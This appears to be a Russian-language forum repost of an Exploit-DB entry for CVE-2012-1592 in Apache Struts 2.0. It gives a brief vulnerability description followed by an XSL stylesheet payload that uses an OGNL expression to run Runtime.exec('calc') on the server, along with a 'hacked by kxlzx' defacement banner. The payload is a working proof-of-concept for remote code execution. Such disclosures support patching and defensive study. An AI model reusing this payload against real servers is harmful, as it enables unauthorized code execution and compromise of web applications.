Exploit Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37009
Проверка EDB
  1. Пройдено
Автор
VOIDLOAFER
Тип уязвимости
WEBAPPS
Платформа
JAVA
CVE
cve-2012-1592
Дата публикации
2012-03-23
Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload
XML:
source: https://www.securityfocus.com/bid/52702/info

Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.

Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. 

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.example.com/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html> 
<body> 
<h2>hacked by kxlzx</h2> 
<h2>http://www.example.com</h2> 
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body> 
</html> 
</xsl:template> 
</xsl:stylesheet>
 
Источник
www.exploit-db.com

Похожие темы